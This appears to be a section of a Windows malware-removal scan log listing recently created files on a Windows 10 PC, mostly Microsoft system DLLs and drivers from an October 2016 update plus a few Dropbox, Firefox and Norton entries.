2016-10-29 14:20 - 2016-10-14 23:56 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2016-10-29 14:20 - 2016-10-14 23:56 - 00120832 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2016-10-29 14:20 - 2016-10-14 23:56 - 00098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2016-10-29 14:20 - 2016-10-14 23:56 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OnDemandConnRouteHelper.dll
2016-10-29 14:20 - 2016-10-14 23:55 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2016-10-29 14:20 - 2016-10-14 23:55 - 00329216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2016-10-29 14:20 - 2016-10-14 23:55 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2016-10-29 14:20 - 2016-10-14 23:55 - 00126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpshell.dll
2016-10-29 14:20 - 2016-10-14 23:54 - 00463872 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2016-10-29 14:20 - 2016-10-14 23:54 - 00241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-10-29 14:20 - 2016-10-14 23:54 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpshell.dll
2016-10-29 14:20 - 2016-10-14 23:53 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActionCenterCPL.dll
2016-10-29 14:20 - 2016-10-14 23:53 - 00549376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActionCenterCPL.dll
2016-10-29 14:20 - 2016-10-14 23:53 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2016-10-29 14:20 - 2016-10-14 23:53 - 00198144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FSClient.dll
2016-10-29 14:20 - 2016-10-14 23:52 - 00432128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-10-29 14:20 - 2016-10-14 23:52 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2016-10-29 14:20 - 2016-10-14 23:52 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2016-10-29 14:20 - 2016-10-14 23:52 - 00115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\IdCtrls.dll
2016-10-29 14:20 - 2016-10-14 23:51 - 13868544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-10-29 14:20 - 2016-10-14 23:51 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2016-10-29 14:20 - 2016-10-14 23:50 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2016-10-29 14:20 - 2016-10-14 23:50 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2016-10-29 14:20 - 2016-10-14 23:50 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-10-29 14:20 - 2016-10-14 23:50 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2016-10-29 14:20 - 2016-10-14 23:49 - 01913344 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2016-10-29 14:20 - 2016-10-14 23:49 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-10-29 14:20 - 2016-10-14 23:49 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-10-29 14:20 - 2016-10-14 23:49 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSManHTTPConfig.exe
2016-10-29 14:20 - 2016-10-14 23:49 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-10-29 14:20 - 2016-10-14 23:48 - 01554944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2016-10-29 14:20 - 2016-10-14 23:48 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2016-10-29 14:20 - 2016-10-14 23:47 - 07792640 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-10-29 14:20 - 2016-10-14 23:47 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-10-29 14:20 - 2016-10-14 23:47 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2016-10-29 14:20 - 2016-10-14 23:46 - 03287552 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-10-29 14:20 - 2016-10-14 23:46 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-10-29 14:20 - 2016-10-14 23:46 - 00336896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2016-10-29 14:20 - 2016-10-14 23:45 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-10-29 14:20 - 2016-10-14 23:45 - 00702464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll
2016-10-29 14:20 - 2016-10-14 23:45 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-10-29 14:20 - 2016-10-14 23:43 - 02748928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2016-10-29 14:20 - 2016-10-14 23:43 - 01365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2016-10-29 14:20 - 2016-10-14 23:43 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsiwmi.dll
2016-10-29 14:20 - 2016-10-14 23:42 - 12349440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-10-29 14:20 - 2016-10-14 23:42 - 06108672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-10-29 14:20 - 2016-10-14 23:42 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\chartv.dll
2016-10-29 14:20 - 2016-10-14 23:41 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-10-29 14:20 - 2016-10-14 23:41 - 05376000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 01060864 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll
2016-10-29 14:20 - 2016-10-14 23:39 - 00109568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\chartv.dll
2016-10-29 14:20 - 2016-10-14 23:38 - 13441024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-10-29 14:20 - 2016-10-14 23:38 - 00675840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-10-29 14:20 - 2016-10-14 23:38 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 04708864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 02256896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 01980416 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 01029632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-10-29 14:20 - 2016-10-14 23:37 - 00093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmifw.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 02484736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gameux.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 01595392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 01492480 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-10-29 14:20 - 2016-10-14 23:36 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-10-29 14:20 - 2016-10-14 23:36 - 00580608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hgcpl.dll
2016-10-29 14:20 - 2016-10-14 23:36 - 00542208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 03054080 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 02999808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2016-10-29 14:20 - 2016-10-14 23:35 - 02708992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 02315264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll
2016-10-29 14:20 - 2016-10-14 23:35 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.dll
2016-10-29 14:20 - 2016-10-14 23:34 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-10-29 14:20 - 2016-10-14 23:34 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2016-10-29 14:20 - 2016-10-14 23:34 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-10-29 14:20 - 2016-10-14 23:34 - 00936448 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-10-29 14:20 - 2016-10-14 23:32 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-10-29 14:20 - 2016-08-06 00:17 - 00619368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-10-29 14:19 - 2016-10-15 00:38 - 00409952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2016-10-29 14:19 - 2016-10-15 00:32 - 00601712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2016-10-29 14:19 - 2016-10-15 00:31 - 02750384 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-10-29 14:19 - 2016-10-15 00:31 - 02190688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-10-29 14:19 - 2016-10-15 00:31 - 00658272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-10-29 14:19 - 2016-10-15 00:31 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-10-29 14:19 - 2016-10-15 00:30 - 00557408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-10-29 14:19 - 2016-10-15 00:29 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-10-29 14:19 - 2016-10-15 00:26 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2016-10-29 14:19 - 2016-10-15 00:26 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2016-10-29 14:19 - 2016-10-15 00:21 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-10-29 14:19 - 2016-10-15 00:21 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-10-29 14:19 - 2016-10-15 00:21 - 00584032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2016-10-29 14:19 - 2016-10-15 00:20 - 02276736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-10-29 14:19 - 2016-10-15 00:19 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2016-10-29 14:19 - 2016-10-15 00:18 - 02166232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-10-29 14:19 - 2016-10-15 00:18 - 01556712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2016-10-29 14:19 - 2016-10-15 00:18 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 01853776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 01123368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 00952416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-10-29 14:19 - 2016-10-15 00:15 - 00687936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-10-29 14:19 - 2016-10-15 00:11 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2016-10-29 14:19 - 2016-10-15 00:02 - 22568960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-10-29 14:19 - 2016-10-15 00:00 - 00323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2016-10-29 14:19 - 2016-10-14 23:59 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\stdole2.tlb
2016-10-29 14:19 - 2016-10-14 23:57 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2016-10-29 14:19 - 2016-10-14 23:56 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2016-10-29 14:19 - 2016-10-14 23:56 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-10-29 14:19 - 2016-10-14 23:56 - 00219648 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSrvPolicyManager.dll
2016-10-29 14:19 - 2016-10-14 23:55 - 00265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcore6.dll
2016-10-29 14:19 - 2016-10-14 23:55 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-10-29 14:19 - 2016-10-14 23:54 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2016-10-29 14:19 - 2016-10-14 23:54 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-10-29 14:19 - 2016-10-14 23:54 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-10-29 14:19 - 2016-10-14 23:54 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autoplay.dll
2016-10-29 14:19 - 2016-10-14 23:53 - 00270336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sud.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00523776 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00506880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\systemcpl.dll
2016-10-29 14:19 - 2016-10-14 23:52 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2016-10-29 14:19 - 2016-10-14 23:51 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-10-29 14:19 - 2016-10-14 23:51 - 00226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2016-10-29 14:19 - 2016-10-14 23:50 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontext.dll
2016-10-29 14:19 - 2016-10-14 23:50 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll
2016-10-29 14:19 - 2016-10-14 23:50 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2016-10-29 14:19 - 2016-10-14 23:49 - 00388608 _____ (Microsoft Corporation) C:\WINDOWS\system32\zipfldr.dll
2016-10-29 14:19 - 2016-10-14 23:49 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\zipfldr.dll
2016-10-29 14:19 - 2016-10-14 23:48 - 23680000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-10-29 14:19 - 2016-10-14 23:47 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-10-29 14:19 - 2016-10-14 23:47 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2016-10-29 14:19 - 2016-10-14 23:46 - 19418112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-10-29 14:19 - 2016-10-14 23:46 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-10-29 14:19 - 2016-10-14 23:45 - 01790464 _____ (Microsoft Corporation) C:\WINDOWS\system32\LocationFramework.dll
2016-10-29 14:19 - 2016-10-14 23:44 - 03307520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-10-29 14:19 - 2016-10-14 23:44 - 00636928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2016-10-29 14:19 - 2016-10-14 23:42 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-10-29 14:19 - 2016-10-14 23:42 - 00805376 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-10-29 14:19 - 2016-10-14 23:42 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2016-10-29 14:19 - 2016-10-14 23:42 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\powercfg.exe
2016-10-29 14:19 - 2016-10-14 23:41 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\iphlpsvc.dll
2016-10-29 14:19 - 2016-10-14 23:41 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2016-10-29 14:19 - 2016-10-14 23:40 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-10-29 14:19 - 2016-10-14 23:39 - 02266624 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-10-29 14:19 - 2016-10-14 23:39 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2016-10-29 14:19 - 2016-10-14 23:39 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2016-10-29 14:19 - 2016-10-14 23:39 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\shdocvw.dll
2016-10-29 14:19 - 2016-10-14 23:38 - 02458112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themecpl.dll
2016-10-29 14:19 - 2016-10-14 23:37 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2016-10-29 14:19 - 2016-10-14 23:37 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2016-10-29 14:19 - 2016-10-14 23:37 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll
2016-10-29 14:19 - 2016-10-14 23:37 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 04423680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteNaturalLanguage.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-10-29 14:19 - 2016-10-14 23:36 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\stobject.dll
2016-10-29 14:19 - 2016-10-14 23:35 - 02670592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-10-29 14:19 - 2016-10-14 23:35 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2016-10-29 14:19 - 2016-10-14 23:35 - 01779712 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-10-29 14:19 - 2016-10-14 23:35 - 01512960 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-10-29 14:19 - 2016-10-14 23:35 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-10-29 14:19 - 2016-10-14 23:34 - 02476544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2016-10-29 07:57 - 2016-10-29 07:57 - 00000000 ____D C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-10-23 10:52 - 2016-10-30 11:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-10-20 18:31 - 2016-10-20 18:40 - 00000000 ____D C:\Users\Harold\Documents\2016 Oct Color Ride
2016-10-16 18:40 - 2016-10-30 17:47 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton 360
2016-10-16 18:34 - 2016-10-16 18:34 - 00003376 _____ C:\WINDOWS\System32\Tasks\Norton WSC Integration
2016-10-12 21:35 - 2016-10-05 06:17 - 01322848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2016-10-12 21:35 - 2016-10-05 06:13 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-10-12 21:35 - 2016-10-05 06:13 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2016-10-12 21:35 - 2016-10-05 06:12 - 02446696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-10-12 21:35 - 2016-10-05 06:09 - 00064352 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys
2016-10-12 21:35 - 2016-10-05 05:51 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-10-12 21:35 - 2016-10-05 05:38 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2016-10-12 21:35 - 2016-10-05 05:36 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-10-12 21:35 - 2016-10-05 05:35 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2016-10-12 21:35 - 2016-10-05 05:35 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2016-10-12 21:35 - 2016-10-05 05:33 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2016-10-12 21:35 - 2016-10-05 05:33 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-10-12 21:35 - 2016-10-05 05:33 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll
2016-10-12 21:35 - 2016-10-05 05:32 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2016-10-12 21:35 - 2016-10-05 05:32 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-10-12 21:35 - 2016-10-05 05:31 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2016-10-12 21:35 - 2016-10-05 05:31 - 00425472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2016-10-12 21:35 - 2016-10-05 05:30 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2016-10-12 21:35 - 2016-10-05 05:29 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2016-10-12 21:35 - 2016-10-05 05:28 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2016-10-12 21:35 - 2016-10-05 05:26 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-10-12 21:35 - 2016-10-05 05:26 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-10-12 21:35 - 2016-10-05 05:26 - 00137216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovs.dll
2016-10-12 21:35 - 2016-10-05 05:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.Ngc.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 01589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-10-12 21:35 - 2016-10-05 05:25 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-10-12 21:35 - 2016-10-05 05:24 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2016-10-12 21:35 - 2016-10-05 05:24 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\adsmsext.dll
2016-10-12 21:35 - 2016-10-05 05:23 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2016-10-12 21:35 - 2016-10-05 05:23 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2016-10-12 21:35 - 2016-10-05 05:23 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
